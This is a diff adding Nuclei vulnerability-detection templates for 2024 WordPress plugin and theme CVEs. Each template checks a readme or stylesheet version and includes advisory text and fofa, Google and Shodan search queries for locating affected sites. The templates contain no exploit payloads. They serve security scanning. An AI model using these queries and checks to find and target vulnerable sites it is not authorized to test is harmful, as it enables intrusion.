+info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + The bitformpro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efa646ee-ebee-4528-a421-09ee3dc8275a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43251 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43251' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43252.yaml b/poc/cve/CVE-2024-43252.yaml new file mode 100644 index 0000000000..4caa21df6d --- /dev/null +++ b/poc/cve/CVE-2024-43252.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43252 + +info: + name: > + Crew HRM <= 1.1.1 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Employee, Leave and Recruitment Management System – Crew HRM plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e3d47-cae3-46a6-9b60-ad1eb6b7ced7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43252 + metadata: + fofa-query: "wp-content/plugins/hr-management/" + google-query: inurl:"/wp-content/plugins/hr-management/" + shodan-query: 'vuln:CVE-2024-43252' + tags: cve,wordpress,wp-plugin,hr-management,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hr-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hr-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43253.yaml b/poc/cve/CVE-2024-43253.yaml new file mode 100644 index 0000000000..5bf4ddc27d --- /dev/null +++ b/poc/cve/CVE-2024-43253.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43253 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: high + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/195788de-129e-4112-bcab-a7835c8164ca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43253 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-43253' + tags: cve,wordpress,wp-plugin,clover-online-orders,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43254.yaml b/poc/cve/CVE-2024-43254.yaml new file mode 100644 index 0000000000..48c52e1a86 --- /dev/null +++ b/poc/cve/CVE-2024-43254.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43254 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: low + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/34d990b6-3021-45d4-9ecd-cfabb7fbc96c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43254 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-43254' + tags: cve,wordpress,wp-plugin,clover-online-orders,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43255.yaml b/poc/cve/CVE-2024-43255.yaml new file mode 100644 index 0000000000..9cf5b31749 --- /dev/null +++ b/poc/cve/CVE-2024-43255.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43255 + +info: + name: > + MyBookTable Bookstore <= 3.3.9 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The MyBookTable Bookstore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.3.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b614aab2-a3e3-410a-917b-cc33634503ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43255 + metadata: + fofa-query: "wp-content/plugins/mybooktable/" + google-query: inurl:"/wp-content/plugins/mybooktable/" + shodan-query: 'vuln:CVE-2024-43255' + tags: cve,wordpress,wp-plugin,mybooktable,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mybooktable/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mybooktable" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43256.yaml b/poc/cve/CVE-2024-43256.yaml new file mode 100644 index 0000000000..212d0ac475 --- /dev/null +++ b/poc/cve/CVE-2024-43256.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43256 + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.36. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/35b1fb1a-a12c-4938-a2d2-74e291db76ef?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43256 + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:CVE-2024-43256' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43257.yaml b/poc/cve/CVE-2024-43257.yaml new file mode 100644 index 0000000000..4b7d4c3569 --- /dev/null +++ b/poc/cve/CVE-2024-43257.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43257 + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.36. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/00aba7b3-4d4a-4aba-8e4e-2e8a928f6143?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43257 + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:CVE-2024-43257' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43258.yaml b/poc/cve/CVE-2024-43258.yaml new file mode 100644 index 0000000000..693d65b113 --- /dev/null +++ b/poc/cve/CVE-2024-43258.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43258 + +info: + name: > + Store Locator Plus <= 2311.17.01 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Store Locator Plus® for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2311.17.01. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3597fa-71e2-4753-b226-5d95e576947a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43258 + metadata: + fofa-query: "wp-content/plugins/store-locator-le/" + google-query: inurl:"/wp-content/plugins/store-locator-le/" + shodan-query: 'vuln:CVE-2024-43258' + tags: cve,wordpress,wp-plugin,store-locator-le,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/store-locator-le/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "store-locator-le" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2311.17.01') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43259.yaml b/poc/cve/CVE-2024-43259.yaml new file mode 100644 index 0000000000..700be973c1 --- /dev/null +++ b/poc/cve/CVE-2024-43259.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43259 + +info: + name: > + Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Order Export for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.23. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e3f8108-6b1b-4720-a450-e58b1833b608?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43259 + metadata: + fofa-query: "wp-content/plugins/order-export-and-more-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/order-export-and-more-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-43259' + tags: cve,wordpress,wp-plugin,order-export-and-more-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/order-export-and-more-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "order-export-and-more-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43260.yaml b/poc/cve/CVE-2024-43260.yaml new file mode 100644 index 0000000000..fb5effde5d --- /dev/null +++ b/poc/cve/CVE-2024-43260.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43260 + +info: + name: > + Clearfy Cache <= 2.2.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc29341-a23e-4694-b852-90794c01473a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43260 + metadata: + fofa-query: "wp-content/plugins/clearfy/" + google-query: inurl:"/wp-content/plugins/clearfy/" + shodan-query: 'vuln:CVE-2024-43260' + tags: cve,wordpress,wp-plugin,clearfy,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clearfy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clearfy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43261.yaml b/poc/cve/CVE-2024-43261.yaml new file mode 100644 index 0000000000..99aaefb5c0 --- /dev/null +++ b/poc/cve/CVE-2024-43261.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43261 + +info: + name: > + Compute Links <= 1.2.1 - Unauthenticated Remote File Inclusion + author: topscoder + severity: critical + description: > + The Compute Links plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2b78e0-1b82-4074-8051-e44dcfe3ac51?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43261 + metadata: + fofa-query: "wp-content/plugins/compute-links/" + google-query: inurl:"/wp-content/plugins/compute-links/" + shodan-query: 'vuln:CVE-2024-43261' + tags: cve,wordpress,wp-plugin,compute-links,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/compute-links/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "compute-links" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43262.yaml b/poc/cve/CVE-2024-43262.yaml new file mode 100644 index 0000000000..9cb82daca8 --- /dev/null +++ b/poc/cve/CVE-2024-43262.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43262 + +info: + name: > + Busiprof <= 2.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Busiprof theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0acf3219-1443-42cc-b3c9-cffb8fd8af07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43262 + metadata: + fofa-query: "wp-content/themes/busiprof/" + google-query: inurl:"/wp-content/themes/busiprof/" + shodan-query: 'vuln:CVE-2024-43262' + tags: cve,wordpress,wp-theme,busiprof,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/busiprof/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "busiprof" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43263.yaml b/poc/cve/CVE-2024-43263.yaml new file mode 100644 index 0000000000..24c1567fec --- /dev/null +++ b/poc/cve/CVE-2024-43263.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43263 + +info: + name: > + Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Visual Composer Starter theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43263 + metadata: + fofa-query: "wp-content/themes/visual-composer-starter/" + google-query: inurl:"/wp-content/themes/visual-composer-starter/" + shodan-query: 'vuln:CVE-2024-43263' + tags: cve,wordpress,wp-theme,visual-composer-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-composer-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43264.yaml b/poc/cve/CVE-2024-43264.yaml new file mode 100644 index 0000000000..b9d3f6b71c --- /dev/null +++ b/poc/cve/CVE-2024-43264.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43264 + +info: + name: > + Create by Mediavine <= 1.9.8 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Create by Mediavine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.8. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c04e40a-6d94-4688-9159-07bf27a9efe0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43264 + metadata: + fofa-query: "wp-content/plugins/mediavine-create/" + google-query: inurl:"/wp-content/plugins/mediavine-create/" + shodan-query: 'vuln:CVE-2024-43264' + tags: cve,wordpress,wp-plugin,mediavine-create,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mediavine-create/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mediavine-create" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43265.yaml b/poc/cve/CVE-2024-43265.yaml new file mode 100644 index 0000000000..19a21758b8 --- /dev/null +++ b/poc/cve/CVE-2024-43265.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43265 + +info: + name: > + Analytify <= 5.3.1 - Cross-Site Request Forgery to Opt-out + author: topscoder + severity: medium + description: > + The Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.3.1. This is due to missing or incorrect nonce validation on the optout_yes() function. This makes it possible for unauthenticated attackers to opt out of tracking via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e407409-989d-48f8-8135-6071015a6064?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43265 + metadata: + fofa-query: "wp-content/plugins/wp-analytify/" + google-query: inurl:"/wp-content/plugins/wp-analytify/" + shodan-query: 'vuln:CVE-2024-43265' + tags: cve,wordpress,wp-plugin,wp-analytify,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-analytify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-analytify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43266.yaml b/poc/cve/CVE-2024-43266.yaml new file mode 100644 index 0000000000..bb3a5b684c --- /dev/null +++ b/poc/cve/CVE-2024-43266.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43266 + +info: + name: > + WP Job Portal <= 2.1.6 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.6 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/630e4595-4be3-4886-8771-f781bcee674d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43266 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-43266' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43267.yaml b/poc/cve/CVE-2024-43267.yaml new file mode 100644 index 0000000000..0a98580cde --- /dev/null +++ b/poc/cve/CVE-2024-43267.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43267 + +info: + name: > + Mega Addons For Elementor <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Mega Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a64c67de-1c16-4dcb-a3e4-81341b37c3e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43267 + metadata: + fofa-query: "wp-content/plugins/ultimate-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/ultimate-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-43267' + tags: cve,wordpress,wp-plugin,ultimate-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43268.yaml b/poc/cve/CVE-2024-43268.yaml new file mode 100644 index 0000000000..be0d582a30 --- /dev/null +++ b/poc/cve/CVE-2024-43268.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43268 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Missing Authorization + author: topscoder + severity: low + description: > + The Backup and Restore WordPress – Backup Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.50. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/61a050bd-deaa-4115-baa5-f63790816450?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43268 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43268' + 